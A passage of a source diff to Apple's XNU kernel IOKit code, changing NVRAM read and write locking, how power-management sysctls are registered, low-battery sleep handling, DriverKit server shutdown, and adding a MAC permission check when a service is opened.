NVRAMRegionInfo variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, - { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; + NVRAMRegionInfo variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, + { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; if (_systemPanicked) { return kIOReturnNotReady; @@ -1742,7 +1871,7 @@ IODTNVRAM::serializeVariables(void) DEBUG_INFO("...\n"); - NVRAMLOCK(); + NVRAMREADLOCK(); for (regionIndex = 0; regionIndex < ARRAY_SIZE(variableRegions); regionIndex++) { currentRegion = &variableRegions[regionIndex]; @@ -1751,10 +1880,12 @@ IODTNVRAM::serializeVariables(void) continue; } - DEBUG_INFO("region = %s\n", currentRegion->name); + DEBUG_INFO("region = %d\n", currentRegion->type); buffer = tmpBuffer = IONew(UInt8, currentRegion->size); if (buffer == nullptr) { - return kIOReturnNoMemory; + ok = false; + ret = kIOReturnNoMemory; + break; } bzero(buffer, currentRegion->size); @@ -1790,44 +1921,48 @@ IODTNVRAM::serializeVariables(void) IODelete(buffer, UInt8, currentRegion->size); - if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) && + if ((currentRegion->type == kIONVRAMPartitionSystem) && (_systemService != nullptr)) { - _systemService->setProperties(_systemDict.get()); - systemUsed = maxLength; - } else if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0) && + _systemService->setVariables(_systemDict.get()); + systemUsed = (uint32_t)(tmpBuffer - buffer); + } else if ((currentRegion->type == kIONVRAMPartitionCommon) && (_commonService != nullptr)) { - _commonService->setProperties(_commonDict.get()); - commonUsed = maxLength; + _commonService->setVariables(_commonDict.get()); + commonUsed = (uint32_t)(tmpBuffer - buffer); } if (!ok) { - return kIOReturnBadArgument; + ret = kIOReturnBadArgument; + break; } } - nvramImage = OSData::withBytes(_nvramImage, _nvramSize); - NVRAMUNLOCK(); DEBUG_INFO("ok=%d\n", ok); - CONTROLLERLOCK(); + if (ok) { + nvramImage = OSData::withBytes(_nvramImage, _nvramSize); + CONTROLLERLOCK(); - if (_systemService) { - sizeUsed = OSNumber::withNumber(systemUsed, 32); - _nvramController->setProperty("SystemUsed", sizeUsed.get()); - sizeUsed.reset(); - } + if (_systemService) { + sizeUsed = OSNumber::withNumber(systemUsed, 32); + _nvramController->setProperty("SystemUsed", sizeUsed.get()); + DEBUG_INFO("SystemUsed=%u\n", (unsigned int)commonUsed); + sizeUsed.reset(); + } - if (_commonService) { - sizeUsed = OSNumber::withNumber(commonUsed, 32); - _nvramController->setProperty("CommonUsed", sizeUsed.get()); - sizeUsed.reset(); - } + if (_commonService) { + sizeUsed = OSNumber::withNumber(commonUsed, 32); + _nvramController->setProperty("CommonUsed", sizeUsed.get()); + DEBUG_INFO("CommonUsed=%u\n", (unsigned int)commonUsed); + sizeUsed.reset(); + } - ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength()); + ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength()); - CONTROLLERUNLOCK(); + CONTROLLERUNLOCK(); + } return ret; } @@ -1932,11 +2067,11 @@ IODTNVRAM::convertPropToObject(UInt8 *propName, UInt32 propNameLength, { const OSSymbol* propSymbolRaw = nullptr; OSObject* propObjectRaw = nullptr; - bool result = convertPropToObject(propName, propNameLength, propData, propDataLength, + bool ok = convertPropToObject(propName, propNameLength, propData, propDataLength, &propSymbolRaw, &propObjectRaw); propSymbol.reset(propSymbolRaw, OSNoRetain); propObject.reset(propObjectRaw, OSNoRetain); - return result; + return ok; } bool @@ -2020,7 +2155,7 @@ IODTNVRAM::convertObjectToProp(UInt8 *buffer, UInt32 *length, } else if (tmpValue < 1000) { snprintf((char *)buffer, remaining, "%d", (uint32_t)tmpValue); } else { - snprintf((char *)buffer, remaining, "0x%x", (uint32_t)tmpValue); + snprintf((char *)buffer, remaining, "%#x", (uint32_t)tmpValue); } } break; @@ -2226,7 +2361,7 @@ IODTNVRAM::readNVRAMPropertyType1(IORegistryEntry *entry, UInt32 resultValueLen = 0; UInt8 byte; - NVRAMLOCK(); + NVRAMREADLOCK(); data = OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())); NVRAMUNLOCK(); @@ -2300,7 +2435,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry, // copy over existing properties for other entries - NVRAMLOCK(); + NVRAMWRITELOCK(); oldData.reset(OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())), OSRetain); if (oldData) { @@ -2403,7 +2538,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry, if (ok) { if (serializeVariables() != kIOReturnSuccess) { - NVRAMLOCK(); + NVRAMWRITELOCK(); if (oldData) { _commonDict->setObject(_registryPropertiesKey.get(), oldData.get()); } else { diff --git a/iokit/Kernel/IOPMGR.cpp b/iokit/Kernel/IOPMGR.cpp index 4fd29c336..48c09e324 100644 --- a/iokit/Kernel/IOPMGR.cpp +++ b/iokit/Kernel/IOPMGR.cpp @@ -30,3 +30,17 @@ #define super IOService OSDefineMetaClassAndAbstractStructors(IOPMGR, IOService); + +void +IOPMGR::enableCPUCore(unsigned int cpu_id, uint64_t entry_pa) +{ + // Fall back to the legacy method if the subclass doesn't override the + // new method. + enableCPUCore(cpu_id); +} + +void +IOPMGR::enableCPUCore(unsigned int cpu_id) +{ + panic("enableCPUCore is unimplemented"); +} diff --git a/iokit/Kernel/IOPMrootDomain.cpp b/iokit/Kernel/IOPMrootDomain.cpp index ed78c3d76..4231fad39 100644 --- a/iokit/Kernel/IOPMrootDomain.cpp +++ b/iokit/Kernel/IOPMrootDomain.cpp @@ -54,6 +54,7 @@ #include #include #include +#include #include "IOKitKernelInternal.h" #if HIBERNATION #include @@ -519,8 +520,8 @@ static UInt32 gWillShutdown = 0; static UInt32 gPagingOff = 0; static UInt32 gSleepWakeUUIDIsSet = false; static uint32_t gAggressivesState = 0; -static uint32_t gHaltTimeMaxLog; -static uint32_t gHaltTimeMaxPanic; +uint32_t gHaltTimeMaxLog; +uint32_t gHaltTimeMaxPanic; IOLock * gHaltLogLock; static char * gHaltLog; enum { kHaltLogSize = 2048 }; @@ -605,6 +606,7 @@ static char gShutdownReasonString[80]; static bool gWakeReasonSysctlRegistered = false; static bool gBootReasonSysctlRegistered = false; static bool gShutdownReasonSysctlRegistered = false; +static bool gWillShutdownSysctlRegistered = false; static AbsoluteTime gUserActiveAbsTime; static AbsoluteTime gUserInactiveAbsTime; @@ -977,6 +979,18 @@ IOSystemShutdownNotification(int stage) return; } + if (kIOSystemShutdownNotificationTerminateDEXTs == stage) { + uint64_t nano, millis; + startTime = mach_absolute_time(); + IOServicePH::systemHalt(); + absolutetime_to_nanoseconds(mach_absolute_time() - startTime, &nano); + millis = nano / NSEC_PER_MSEC; + if (true || (gHaltTimeMaxLog && (millis >= gHaltTimeMaxLog))) { + printf("IOServicePH::systemHalt took %qd ms\n", millis); + } + return; + } + assert(kIOSystemShutdownNotificationStageProcessExit == stage); IOLockLock(gHaltLogLock); @@ -1002,7 +1016,6 @@ IOSystemShutdownNotification(int stage) } } - extern "C" int sync_internal(void); /* @@ -1171,11 +1184,11 @@ sysctl_sleepwaketime SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, sleeptime, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOLastUserSleepTime, 0, sysctl_sleepwaketime, "S,timeval", ""); static SYSCTL_PROC(_kern, OID_AUTO, waketime, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOLastWakeTime, 0, sysctl_sleepwaketime, "S,timeval", ""); SYSCTL_QUAD(_kern, OID_AUTO, wake_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gIOLastWakeAbsTime, ""); @@ -1184,11 +1197,15 @@ SYSCTL_QUAD(_kern, OID_AUTO, useractive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, & SYSCTL_QUAD(_kern, OID_AUTO, userinactive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gUserInactiveAbsTime, ""); static int -sysctl_willshutdown -(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +sysctl_willshutdown SYSCTL_HANDLER_ARGS { - int new_value, changed; - int error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed); + int new_value, changed, error; + + if (!gWillShutdownSysctlRegistered) { + return ENOENT; + } + + error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed); if (changed) { if (!gWillShutdown && (new_value == 1)) { IOPMRootDomainWillShutdown(); @@ -1200,12 +1217,9 @@ sysctl_willshutdown } static SYSCTL_PROC(_kern, OID_AUTO, willshutdown, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_willshutdown, "I", ""); -extern struct sysctl_oid sysctl__kern_iokittest; -extern struct sysctl_oid sysctl__debug_iokit; - #if defined(XNU_TARGET_OS_OSX) static int @@ -1241,11 +1255,11 @@ sysctl_progressmeter } static SYSCTL_PROC(_kern, OID_AUTO, progressmeterenable, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_progressmeterenable, "I", ""); static SYSCTL_PROC(_kern, OID_AUTO, progressmeter, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_progressmeter, "I", ""); #endif /* defined(XNU_TARGET_OS_OSX) */ @@ -1269,7 +1283,7 @@ sysctl_consoleoptions } static SYSCTL_PROC(_kern, OID_AUTO, consoleoptions, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_consoleoptions, "I", ""); @@ -1280,7 +1294,7 @@ sysctl_progressoptions SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, progressoptions, - CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_progressoptions, "S,vc_progress_user_options", ""); @@ -1290,20 +1304,32 @@ sysctl_wakereason SYSCTL_HANDLER_ARGS char wr[sizeof(gWakeReasonString)]; wr[0] = '\0'; - if (gRootDomain) { + if (gRootDomain && gWakeReasonSysctlRegistered) { gRootDomain->copyWakeReasonString(wr, sizeof(wr)); + } else { + return ENOENT; } return sysctl_io_string(req, wr, 0, 0, NULL); } SYSCTL_PROC(_kern, OID_AUTO, wakereason, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_wakereason, "A", "wakereason"); -SYSCTL_STRING(_kern, OID_AUTO, bootreason, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, - gBootReasonString, sizeof(gBootReasonString), ""); +static int +sysctl_bootreason SYSCTL_HANDLER_ARGS +{ + if (!os_atomic_load(&gBootReasonSysctlRegistered, acquire)) { + return ENOENT; + } + + return sysctl_io_string(req, gBootReasonString, 0, 0, NULL); +} + +SYSCTL_PROC(_kern, OID_AUTO, bootreason, + CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, + NULL, 0, sysctl_bootreason, "A", ""); static int sysctl_shutdownreason SYSCTL_HANDLER_ARGS @@ -1311,15 +1337,17 @@ sysctl_shutdownreason SYSCTL_HANDLER_ARGS char sr[sizeof(gShutdownReasonString)]; sr[0] = '\0'; - if (gRootDomain) { + if (gRootDomain && gShutdownReasonSysctlRegistered) { gRootDomain->copyShutdownReasonString(sr, sizeof(sr)); + } else { + return ENOENT; } return sysctl_io_string(req, sr, 0, 0, NULL); } SYSCTL_PROC(_kern, OID_AUTO, shutdownreason, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_shutdownreason, "A", "shutdownreason"); static int @@ -1341,7 +1369,7 @@ sysctl_targettype SYSCTL_HANDLER_ARGS } SYSCTL_PROC(_hw, OID_AUTO, targettype, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_targettype, "A", "targettype"); static SYSCTL_INT(_debug, OID_AUTO, noidle, CTLFLAG_RW, &gNoIdleFlag, 0, ""); @@ -1373,7 +1401,7 @@ sysctl_aotmetrics SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, aotmetrics, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_aotmetrics, "S,IOPMAOTMetrics", ""); @@ -1422,7 +1450,7 @@ sysctl_aotmodebits } static SYSCTL_PROC(_kern, OID_AUTO, aotmodebits, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_aotmodebits, "I", ""); static int @@ -1447,7 +1475,7 @@ sysctl_aotmode } static SYSCTL_PROC(_kern, OID_AUTO, aotmode, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_aotmode, "I", ""); //****************************************************************************** @@ -1748,24 +1776,7 @@ IOPMrootDomain::start( IOService * nub ) // read swd_panic boot-arg PE_parse_boot_argn("swd_panic", &gSwdPanic, sizeof(gSwdPanic)); - sysctl_register_oid(&sysctl__kern_sleeptime); - sysctl_register_oid(&sysctl__kern_waketime); - sysctl_register_oid(&sysctl__kern_willshutdown); - sysctl_register_oid(&sysctl__kern_iokittest); - sysctl_register_oid(&sysctl__debug_iokit); - sysctl_register_oid(&sysctl__hw_targettype); - -#if defined(XNU_TARGET_OS_OSX) - sysctl_register_oid(&sysctl__kern_progressmeterenable); - sysctl_register_oid(&sysctl__kern_progressmeter); - sysctl_register_oid(&sysctl__kern_wakereason); -#endif /* defined(XNU_TARGET_OS_OSX) */ - sysctl_register_oid(&sysctl__kern_consoleoptions); - sysctl_register_oid(&sysctl__kern_progressoptions); - - sysctl_register_oid(&sysctl__kern_aotmode); - sysctl_register_oid(&sysctl__kern_aotmodebits); - sysctl_register_oid(&sysctl__kern_aotmetrics); + gWillShutdownSysctlRegistered = true; #if HIBERNATION #if defined(__arm64__) @@ -2971,6 +2982,9 @@ IOPMrootDomain::powerChangeDone( unsigned long previousPowerState ) // Until the platform driver can claim its wake reasons strlcat(gWakeReasonString, wakeReason->getCStringNoCopy(), sizeof(gWakeReasonString)); + if (!gWakeReasonSysctlRegistered) { + gWakeReasonSysctlRegistered = true; + } WAKEEVENT_UNLOCK(); } @@ -6002,6 +6016,27 @@ IOPMrootDomain::overrideOurPowerChange( _currentCapability, changeFlags, request->getTag()); + +#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT + /* + * ASBM send lowBattery notifications every 1 second until the device + * enters hibernation. This queues up multiple sleep requests. + * After the device wakes from hibernation, none of these previously + * queued sleep requests are valid. + * lowBattteryCondition variable is set when ASBM notifies rootDomain + * and is cleared at the very last point in sleep. + * Any attempt to sleep with reason kIOPMSleepReasonLowPower without + * lowBatteryCondition is invalid + */ + if (REQUEST_TAG_TO_REASON(request->getTag()) == kIOPMSleepReasonLowPower) { + if (!lowBatteryCondition) { + DLOG("Duplicate lowBattery sleep"); + *inOutChangeFlags |= kIOPMNotDone; + return; + } + } +#endif + if ((AOT_STATE == desiredPowerState) && (ON_STATE == currentPowerState)) { // Assertion may have been taken in AOT leading to changePowerStateTo(AOT) *inOutChangeFlags |= kIOPMNotDone; @@ -6015,15 +6050,6 @@ IOPMrootDomain::overrideOurPowerChange( return; } -#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT - if (lowBatteryCondition && (desiredPowerState < currentPowerState)) { - // Reject sleep requests when lowBatteryCondition is TRUE to - // avoid racing with the impending system shutdown. - *inOutChangeFlags |= kIOPMNotDone; - return; - } -#endif - if (desiredPowerState < currentPowerState) { if (CAP_CURRENT(kIOPMSystemCapabilityGraphics)) { // Root domain is dropping power state from ON->SLEEP. @@ -8156,23 +8182,9 @@ IOPMrootDomain::handlePowerNotification( UInt32 msg ) * Power Emergency */ if (msg & kIOPMPowerEmergency) { - DLOG("Low battery notification received\n"); -#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT - // Wait for the next low battery notification if the system state is - // in transition. - if ((_systemTransitionType == kSystemTransitionNone) && - CAP_CURRENT(kIOPMSystemCapabilityCPU) && - !systemBooting && !systemShutdown && !gWillShutdown) { - // Setting lowBatteryCondition will prevent system sleep - lowBatteryCondition = true; - - // Notify userspace to initiate system shutdown - messageClients(kIOPMMessageRequestSystemShutdown); - } -#else + DLOG("Received kIOPMPowerEmergency"); lowBatteryCondition = true; privateSleepSystem(kIOPMSleepReasonLowPower); -#endif } /* @@ -10692,9 +10704,6 @@ IOPMrootDomain::claimSystemWakeEvent( // Lazy registration until the platform driver stops registering // the same name. gWakeReasonSysctlRegistered = true; -#if !defined(XNU_TARGET_OS_OSX) - sysctl_register_oid(&sysctl__kern_wakereason); -#endif /* !defined(XNU_TARGET_OS_OSX) */ } if (addWakeReason) { _systemWakeEventsArray->setObject(dict.get()); @@ -10737,8 +10746,7 @@ IOPMrootDomain::claimSystemBootEvent( if (!gBootReasonSysctlRegistered) { // Lazy sysctl registration after setting gBootReasonString strlcat(gBootReasonString, reason, sizeof(gBootReasonString)); - sysctl_register_oid(&sysctl__kern_bootreason); - gBootReasonSysctlRegistered = true; + os_atomic_store(&gBootReasonSysctlRegistered, true, release); } WAKEEVENT_UNLOCK(); } @@ -10767,10 +10775,7 @@ IOPMrootDomain::claimSystemShutdownEvent( } strlcat(gShutdownReasonString, reason, sizeof(gShutdownReasonString)); - if (!gShutdownReasonSysctlRegistered) { - sysctl_register_oid(&sysctl__kern_shutdownreason); - gShutdownReasonSysctlRegistered = true; - } + gShutdownReasonSysctlRegistered = true; WAKEEVENT_UNLOCK(); } diff --git a/iokit/Kernel/IOPlatformExpert.cpp b/iokit/Kernel/IOPlatformExpert.cpp index 407dd5b02..3fdec62e4 100644 --- a/iokit/Kernel/IOPlatformExpert.cpp +++ b/iokit/Kernel/IOPlatformExpert.cpp @@ -1082,6 +1082,8 @@ PEHaltRestartInternal(unsigned int type, uint32_t details) IOCPURunPlatformPanicActions(type, details); } } + } else if (type == kPEPanicDiagnosticsDone) { + IOCPURunPlatformPanicActions(type, details); } skip_to_haltRestart: diff --git a/iokit/Kernel/IOService.cpp b/iokit/Kernel/IOService.cpp index c99de8858..04b3faf94 100644 --- a/iokit/Kernel/IOService.cpp +++ b/iokit/Kernel/IOService.cpp @@ -370,6 +370,7 @@ IOService * fSystemPowerAckTo; uint32_t fSystemPowerAckRef; uint8_t fSystemOff; uint8_t fUserServerOff; +uint8_t fWaitingUserServers; void lock(); void unlock(); @@ -4150,6 +4151,12 @@ IOServicePH::serverRemove(IOUserServer * server) if (idx != -1U) { fUserServers->removeObject(idx); } + + if (fWaitingUserServers) { + fWaitingUserServers = false; + IOLockWakeup(gJobsLock, &fWaitingUserServers, /* one-thread */ false); + } + unlock(); } @@ -4275,6 +4282,41 @@ IOServicePH::matchingEnd(IOService * service) serverAck(NULL); } + +void +IOServicePH::systemHalt(void) +{ + OSArray * notifyServers; + uint64_t deadline; + + lock(); + notifyServers = OSArray::withArray(fUserServers); + unlock(); + + if (notifyServers) { + notifyServers->iterateObjects(^bool (OSObject * obj) { + IOUserServer * us; + us = (typeof(us))obj; + us->systemHalt(); + return false; + }); + OSSafeReleaseNULL(notifyServers); + } + + lock(); + clock_interval_to_deadline(1000, kMillisecondScale, &deadline); + while (0 < fUserServers->getCount()) { + fWaitingUserServers = true; + __assert_only int waitResult = + IOLockSleepDeadline(gJobsLock, &fWaitingUserServers, deadline, THREAD_UNINT); + assert((THREAD_AWAKENED == waitResult) || (THREAD_TIMED_OUT == waitResult)); + if (THREAD_TIMED_OUT == waitResult) { + break; + } + } + unlock(); +} + bool IOServicePH::serverSlept(void) { diff --git a/iokit/Kernel/IOStartIOKit.cpp b/iokit/Kernel/IOStartIOKit.cpp index c022807f2..cb13e69e2 100644 --- a/iokit/Kernel/IOStartIOKit.cpp +++ b/iokit/Kernel/IOStartIOKit.cpp @@ -173,7 +173,6 @@ InitIOKit(void *dtTop) IOLibInit(); OSlibkernInit(); IOMachPortInitialize(); - devsw_init(); gIOProgressBackbufferKey = OSSymbol::withCStringNoCopy(kIOProgressBackbufferKey); gIORemoveOnReadProperties = OSSet::withObjects((const OSObject **) &gIOProgressBackbufferKey, 1); diff --git a/iokit/Kernel/IOStatistics.cpp b/iokit/Kernel/IOStatistics.cpp index 20d9cc3ef..d0e87bf24 100644 --- a/iokit/Kernel/IOStatistics.cpp +++ b/iokit/Kernel/IOStatistics.cpp @@ -151,6 +151,10 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru int error = EINVAL; uint32_t request = arg2; + if (!IOStatistics::isEnabled()) { + return ENOENT; + } + switch (request) { case kIOStatisticsGeneral: error = IOStatistics::getStatistics(req); @@ -171,17 +175,18 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru SYSCTL_NODE(_debug, OID_AUTO, iokit_statistics, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "IOStatistics"); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, general, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsGeneral, oid_sysctl, "S", ""); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, workloop, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsWorkLoop, oid_sysctl, "S", ""); static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, userclient, - CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, kIOStatisticsUserClient, oid_sysctl, "S", ""); + void IOStatistics::initialize() { @@ -194,10 +199,6 @@ IOStatistics::initialize() return; } - sysctl_register_oid(&sysctl__debug_iokit_statistics_general); - sysctl_register_oid(&sysctl__debug_iokit_statistics_workloop); - sysctl_register_oid(&sysctl__debug_iokit_statistics_userclient); - lock = IORWLockAlloc(); if (!lock) { return; diff --git a/iokit/Kernel/IOUserClient.cpp b/iokit/Kernel/IOUserClient.cpp index 12bc47e46..6d1edda91 100644 --- a/iokit/Kernel/IOUserClient.cpp +++ b/iokit/Kernel/IOUserClient.cpp @@ -4213,6 +4213,11 @@ is_io_service_open_extended( return kIOReturnBadArgument; } +#if CONFIG_MACF + if (mac_iokit_check_open_service(kauth_cred_get(), service, connect_type) != 0) { + return kIOReturnNotPermitted; + } +#endif do{ if (properties) { return kIOReturnUnsupported; diff --git a/iokit/Kernel/IOUserServer.cpp b/iokit/Kernel/IOUserServer.cpp index 88fd179e5..ffd44f0c7 100644 --- a/iokit/Kernel/IOUserServer.cpp +++ b/iokit/Kernel/IOUserServer.cpp @@ -2867,7 +2867,7 @@ IOUserServer::rpc(IORPC rpc) 0, &message_moved); } else { assert(replySize >= (sizeof(IORPCMessageMach) + sizeof(IORPCMessage))); - ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, &message_moved); + ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, FALSE, &message_moved); } ipc_port_release_send(sendPort); @@ -3365,6 +3365,44 @@ IOUserClient * IOUserServer::withTask(task_t owningTask) IOReturn IOUserServer::clientClose(void) { + OSArray * services; + + if (kIODKLogSetup & gIODKDebug) { + DKLOG("%s::clientClose(%p)\n", getName(), this); + } + + services = NULL; + IOLockLock(fLock); + if (fServices) { + services = OSArray::withArray(fServices); + } + IOLockUnlock(fLock); + + // if this was a an expected exit, termination and stop should have detached at this + // point, so send any provider still attached and not owned by this user server + // the ClientCrashed() notification + if (services) { + services->iterateObjects(^bool (OSObject * obj) { + IOService * service; + IOService * provider; + + service = (IOService *) obj; + if (service->isInactive()) { + return false; + } + provider = service->getProvider(); + if (provider + && (!provider->reserved->uvars || (provider->reserved->uvars->userServer != this))) { + if (kIODKLogSetup & gIODKDebug) { + DKLOG(DKS "::ClientCrashed(" DKS ")\n", DKN(provider), DKN(service)); + } + provider->ClientCrashed(service, 0); + } + return false; + }); + services->release(); + } + terminate(); return kIOReturnSuccess; } @@ -3700,11 +3738,10 @@ IOUserServer::serviceNewUserClient(IOService * service, task_t owningTask, void if (!(kIODKDisableEntitlementChecking & gIODKDebug)) { bundleID = NULL; - entitlements = NULL; + entitlements = IOUserClient::copyClientEntitlements(owningTask); if (fEntitlements && fEntitlements->getObject(gIODriverKitUserClientEntitlementAllowAnyKey)) { ok = true; } else { - entitlements = IOUserClient::copyClientEntitlements(owningTask); bundleID = service->copyProperty(gIOModuleIdentifierKey); ok = (entitlements && bundleID @@ -4115,6 +4152,48 @@ IOUserServer::systemPower(bool powerOff) } +void +IOUserServer::systemHalt(void) +{ + OSArray * services; + + if (true || (kIODKLogPM & gIODKDebug)) { + DKLOG("%s::systemHalt()\n", getName()); + } + + IOLockLock(fLock); + services = OSArray::withArray(fServices); + IOLockUnlock(fLock); + + if (services) { + services->iterateObjects(^bool (OSObject * obj) { + IOService * service; + IOService * provider; + IOOptionBits terminateOptions; + bool root; + + service = (IOService *) obj; + provider = service->getProvider(); + if (!provider) { + DKLOG("stale service " DKS " found, skipping termination\n", DKN(service)); + return false; + } + root = (NULL == provider->getProperty(gIOUserServerNameKey, gIOServicePlane)); + if (true || (kIODKLogPM & gIODKDebug)) { + DKLOG("%d: terminate(" DKS ")\n", root, DKN(service)); + } + if (!root) { + return false; + } + terminateOptions = kIOServiceRequired | kIOServiceTerminateNeedWillTerminate; + if (!service->terminate(terminateOptions)) { + IOLog("failed to terminate service %s-0x%llx\n", service->getName(), service->getRegistryEntryID()); + } + return false; + }); + } + OSSafeReleaseNULL(services); +} IOReturn IOUserServer::serviceStarted(IOService * service, IOService * provider, bool result) @@ -4150,9 +4229,21 @@ IOUserServer::serviceStarted(IOService * service, IOService * provider, bool res pmProvider = pmProvider->getProvider(); } if (pmProvider) { + IOService * entry; OSObject * prop; + OSObject * nextProp; OSString * str; - prop = pmProvider->copyProperty("non-removable"); + + entry = pmProvider; + prop = NULL; + do { + nextProp = entry->copyProperty("non-removable"); + if (nextProp) { + OSSafeReleaseNULL(prop); + prop = nextProp; + } + entry = entry->getProvider(); + } while (entry); if (prop) { str = OSDynamicCast(OSString, prop); if (str && str->isEqualTo("yes")) { @@ -4287,7 +4378,7 @@ IOUserServer::serviceWillTerminate(IOService * client, IOService * provider, IOO } if (willTerminate) { - if (IOServicePH::serverSlept()) { + if ((true) || IOServicePH::serverSlept()) { client->Stop_async(provider); ret 